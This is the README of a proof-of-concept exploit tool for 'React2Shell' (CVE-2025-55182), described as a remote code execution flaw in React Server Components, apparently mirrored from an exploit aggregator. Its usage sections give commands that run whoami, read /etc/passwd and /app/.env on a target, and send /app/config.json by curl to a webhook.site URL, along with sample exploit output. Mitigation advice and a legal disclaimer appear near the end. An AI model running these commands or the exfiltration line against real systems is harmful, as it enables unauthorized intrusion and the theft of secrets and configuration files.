## https://sploitus.com/exploit?id=5627E1B1-B9E5-5AF3-83BC-05AEC20954EC
# 🚨 CVE-2025-55182 "React2Shell" — Critical RCE in React Server Components



![CVE-2025-55182 Banner](https://github.com/user-attachments/assets/906281d4-6513-4a8c-8b60-6d8947341dfc)

[![Python 3.8+](https://img.shields.io/badge/Python-3.8+-blue.svg)](https://www.python.org/)
[![License](https://img.shields.io/badge/License-Research-red.svg)](LICENSE)
[![CVSS](https://img.shields.io/badge/CVSS-10.0-critical.svg)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)
[![Platform](https://img.shields.io/badge/Platform-Linux%20%7C%20Windows%20%7C%20macOS-lightgrey.svg)]()

**Critical deserialization vulnerability in React Server Components leading to Remote Code Execution**



## 📋 Table of Contents
- [📖 Overview](#-overview)
- [⚡ Quick Start](#-quick-start)
- [🎯 Affected Systems](#-affected-systems)
- [🔧 Usage Examples](#-usage-examples)
- [📁 Project Structure](#-project-structure)
- [🛡️ Mitigation Strategies](#️-mitigation-strategies)
- [⚠️ Legal Disclaimer](#️-legal-disclaimer)
- [🔗 References](#-references)

## 📖 Overview

CVE-2025-55182, dubbed "React2Shell", is a critical security vulnerability in **React Server Components (RSC)** that allows **unauthenticated remote code execution** through unsafe deserialization of server-side React components.

### 📊 Technical Details

| Aspect | Details |
|--------|---------|
| **CVSS Score** | 10.0 (Critical) |
| **Attack Vector** | Network |
| **Attack Complexity** | Low |
| **Privileges Required** | None |
| **User Interaction** | None |
| **Impact** | Confidentiality, Integrity, Availability |

### 🔥 Impact Assessment

- Remote Code Execution
- Data Exfiltration
- System Compromise

## ⚡ Quick Start

### Prerequisites
- Python 3.8 or higher
- Network access to target system (authorized testing only)

### Installation
```bash
# Clone the repository
git clone https://github.com/m3m0ryc0rrupt/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC

# Install dependencies
python -m venv venv
source venv/bin/activate   # Linux / macOS
venv\Scripts\activate      # Windows
pip install -r requirements.txt
```

### Basic Usage
```bash
# Check if system is vulnerable
python CVE-2025-55182.py https://target.com "whoami"

# Read sensitive files
python CVE-2025-55182.py https://target.com "cat /etc/passwd"
```

## 🎯 Affected Systems

### ✅ Vulnerable
- React Server Components implementations
- Next.js (App Router + RSC)
- Vite RSC plugins
- Parcel RSC tools
- Redwood, Waku, and other RSC-based frameworks

### โŒ Not Affected
- Pure client-side React applications
- Applications not using Server Components
- Traditional SSR without RSC

## 🔧 Usage Examples

### Basic Command Execution
```bash
# System information
./CVE-2025-55182.py https://target.com "uname -a"
./CVE-2025-55182.py https://target.com "id"

# File operations
./CVE-2025-55182.py https://target.com "cat /app/.env"
./CVE-2025-55182.py https://target.com "ls -la /var/www"

# Data exfiltration
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/YOUR-ID -d @/app/config.json"
```

### Expected Output
When successful, you'll see:
```bash
$ ./CVE-2025-55182.py https://target.com "whoami"

 [ASCII-art "REACT2SHELL" banner]
                     CVE-2025-55182 ⋮ Unauthenticated RCE
              Next.js + React Server Components = root shell

[+] CVE-2025-55182 Exploit
[+] Target  : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command executed on server
[+] Server response:
node
```

## ๐Ÿ“ Project Structure

```
CVE-2025-55182/
├── 📜 README.md                 # This documentation
├── 📜 CVE-2025-55182.py         # Main RCE exploit
└── 📜 requirements.txt          # Python dependencies
```

### Exploit Workflow
```mermaid
sequenceDiagram
    participant A as Attacker
    participant V as Vulnerable System
    participant E as Exploit Chain
    
    A->>V: 1. Send Malformed RSC Payload
    V->>E: 2. Unsafe Deserialization Trigger
    E->>V: 3. Code Execution via eval()
    V->>A: 4. Return Command Output
```

## ๐Ÿ›ก๏ธ Mitigation Strategies

### Immediate Actions
1. **Patch Immediately**
   - Update React to patched versions
   - Upgrade Next.js or RSC frameworks
   
2. **Security Audits**
   ```bash
   npm audit
   yarn audit
   pnpm audit
   ```

3. **Temporary Measures** (not substitutes for patching)
   - Implement WAF rules blocking RSC serialization patterns
   - Add request validation middleware
   - Monitor for suspicious payloads

### Long-term Protection
- Implement proper input validation
- Use safe serialization libraries
- Update dependencies regularly
- Run security scanning in CI/CD

## โš ๏ธ Legal Disclaimer



**โš ๏ธ WARNING: FOR AUTHORIZED SECURITY TESTING ONLY โš ๏ธ**



This Proof of Concept is provided for **educational purposes and authorized security testing only**. 

### 🚫 Strictly Prohibited:
- Testing systems without explicit written permission
- Use in production environments without authorization
- Any illegal or malicious activities

### ✅ Permitted Use:
- Testing your own systems and applications
- Authorized penetration testing engagements
- Bug bounty programs within scope
- Security research in controlled environments

**You are solely responsible for ensuring compliance with all applicable laws and regulations.**

## 🔗 References

- [CVE-2025-55182 Official Entry](https://vulners.com/cve/CVE-2025-55182)
- [React Security Advisory](https://github.com/facebook/react/security/advisories)
- [Next.js Security Updates](https://nextjs.org/blog/security)
- [NVD Vulnerability Database](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)

## 📞 Contact & Reporting

Found a vulnerable system? **Responsibly disclose** to the affected organization's security team.



---
**Remember: With great power comes great responsibility. Use this knowledge to make the web safer for everyone.**

โญ If you found this useful, consider starring the repository!